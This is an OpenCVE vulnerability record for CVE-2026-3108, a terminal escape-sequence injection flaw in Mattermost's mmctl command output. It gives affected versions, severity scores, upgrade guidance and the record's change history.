Description
Mattermost versions 11.2.x <= 11.2.2, 10.11.x <= 10.11.10, 11.4.x <= 11.4.0, 11.3.x <= 11.3.1 fail to sanitize user-controlled post content in the mmctl commands terminal output which allows attackers to manipulate administrator terminals via crafted messages containing ANSI and OSC escape sequences that enable screen manipulation, fake prompts, and clipboard hijacking.. Mattermost Advisory ID: MMSA-2026-00599
Published: 2026-03-26
Score: 8 High
EPSS: < 1% Very Low
KEV: No
Impact: Terminal Manipulation via Escape Sequences
Action: Patch
AI Analysis

Impact

Mattermost Server versions prior to 11.5.0, 11.2.3, 10.11.11, 11.4.1, and 11.3.2 do not escape ANSI and OSC codes that users can embed in post content. When the server outputs this content in the mmctl terminal, the stray escape sequences are interpreted by the terminal, causing screen manipulation, fake prompts, or clipboard hijacking.

Affected Systems

The issue affects Mattermost Server 11.2.x up to 11.2.2, 10.11.x up to 10.11.10, 11.4.x up to 11.4.0, and 11.3.x up to 11.3.1. Upgrading to 11.5.0, 11.2.3, 10.11.11, 11.4.1, 11.3.2 or newer resolves the problem.

Risk and Exploitability

The CVSS score of 8.0 indicates high severity, while the EPSS score of less than 1 % suggests that exploitation is currently infrequent. The vulnerability is not listed in the CISA KEV catalog. The likely attack vector involves an attacker posting crafted content that includes escape sequences and an administrator later executing an mmctl terminal command that displays that content, which then allows the injected sequences to act on the terminal.

Generated by OpenCVE AI on March 30, 2026 at 21:50 UTC.

Remediation

Vendor Solution

Update Mattermost to versions 11.5.0, 11.2.3, 10.11.11, 11.4.1, 11.3.2 or higher.

OpenCVE Recommended Actions

  • Upgrade Mattermost Server to a fixed release such as 11.5.0, 11.2.3, 10.11.11, 11.4.1, 11.3.2 or newer.
  • If an upgrade cannot be performed immediately, restrict the use of mmctl terminal commands to trusted administrators and avoid viewing command output that may contain untrusted post content.

Generated by OpenCVE AI on March 30, 2026 at 21:50 UTC.

Tracking

Sign in to view the affected projects.

Advisories
Source ID Title
Github GHSA Github GHSA GHSA-3439-vqgj-2gcf Mattermost allows attackers to manipulate administrator terminals via crafted messages containing ANSI and OSC escape sequences
References
Link Providers
https://mattermost.com/security-updates cve-icon cve-icon
History

Mon, 30 Mar 2026 20:00:00 +0000

Type Values Removed Values Added
First Time appeared Mattermost mattermost Server
CPEs cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*
cpe:2.3:a:mattermost:mattermost_server:11.4.0:*:*:*:*:*:*:*
Vendors & Products Mattermost mattermost Server

Fri, 27 Mar 2026 08:45:00 +0000

Type Values Removed Values Added
First Time appeared Mattermost
Mattermost mattermost
Vendors & Products Mattermost
Mattermost mattermost

Thu, 26 Mar 2026 18:15:00 +0000

Type Values Removed Values Added
Metrics ssvc

{'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'total'}, 'version': '2.0.3'}

Thu, 26 Mar 2026 16:45:00 +0000

Type Values Removed Values Added
Description Mattermost versions 11.2.x <= 11.2.2, 10.11.x <= 10.11.10, 11.4.x <= 11.4.0, 11.3.x <= 11.3.1 fail to sanitize user-controlled post content in the mmctl commands terminal output which allows attackers to manipulate administrator terminals via crafted messages containing ANSI and OSC escape sequences that enable screen manipulation, fake prompts, and clipboard hijacking.. Mattermost Advisory ID: MMSA-2026-00599
Title Terminal Escape Injection in mmctl Report Posts Command
Weaknesses CWE-150
References
Metrics cvssV3_1

{'score': 8, 'vector': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H'}

Subscriptions

Mattermost Mattermost Mattermost Server
cve-icon MITRE

Status: PUBLISHED

Assigner: Mattermost

Published:

Updated: 2026-03-27T03:55:41.498Z

Reserved: 2026-02-24T10:50:40.507Z

Link: CVE-2026-3108

cve-icon Vulnrichment

Updated: 2026-03-26T17:47:48.522Z

cve-icon NVD

Status : Analyzed

Published: 2026-03-26T17:16:41.797

Modified: 2026-03-30T19:45:27.367

Link: CVE-2026-3108

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-03-31T20:08:56Z

Weaknesses